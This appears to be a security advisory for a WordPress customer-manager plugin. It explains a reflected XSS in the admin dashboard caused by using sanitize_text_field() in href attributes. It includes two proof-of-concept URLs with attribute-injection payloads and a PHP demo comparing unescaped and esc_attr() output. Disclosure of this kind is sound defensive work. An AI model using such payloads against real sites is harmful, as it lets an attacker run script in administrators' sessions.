The wccm_customers_ids and wccm_customers_emails parameters are output in href attributes after being sanitised with the sanitize_text_field() function, which is not appropriate for that context, as a payload such as ' injected-attribute=value will still be injected. This leads to a reflected XSS issue in the administrator dashboard when opening a malicious URL:
https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-guests-list&wccm_customers_ids=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-ids%2F%29+b%3D%27
https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-guests-list&wccm_customers_emails=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-emails%2F%29+b%3D%27
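The difference between sanitize_text_field() and attribute-context escaping, as an added example that is not the plugin's code: it renders the same value both ways and lists the attributes an HTML parser sees on the link. The link template and its single-quoted href are assumptions, and the function fallbacks are simplified stand-ins so the file runs without WordPress; esc_attr() is WordPress's escaper for attribute values.

```php
<?php
// Added example, not the plugin's code. Runs stand-alone: the fallbacks below
// are simplified stand-ins used only when WordPress is not loaded.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) {
        // Strips tags and collapses whitespace; quotes pass through untouched,
        // as they do in the real function.
        return trim(preg_replace('/\s+/', ' ', strip_tags((string) $str)));
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        // Stand-in: encodes &, <, >, " and ' for use inside an attribute value.
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Hypothetical link template; the single-quoted href is an assumption.
function render_link(string $value): string {
    return "<a href='admin.php?wccm_customers_ids=" . $value . "'>guests</a>";
}

// Returns the attribute names a parser sees on the first <a> element.
function anchor_attributes(string $html): array {
    $prev = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $names = [];
    foreach ($doc->getElementsByTagName('a')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

$input = "' injected-attribute=value"; // payload shape quoted in the advisory

// Before: sanitised only, so the quote closes the href early.
$before = render_link(sanitize_text_field($input));
// After: escaped for the attribute context at the point of output.
$after  = render_link(esc_attr(sanitize_text_field($input)));

echo $before, "\n  attributes: ", implode(', ', anchor_attributes($before)), "\n";
echo $after,  "\n  attributes: ", implode(', ', anchor_attributes($after)), "\n";
```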
2021-03-30
2021-03-30
2021-04-09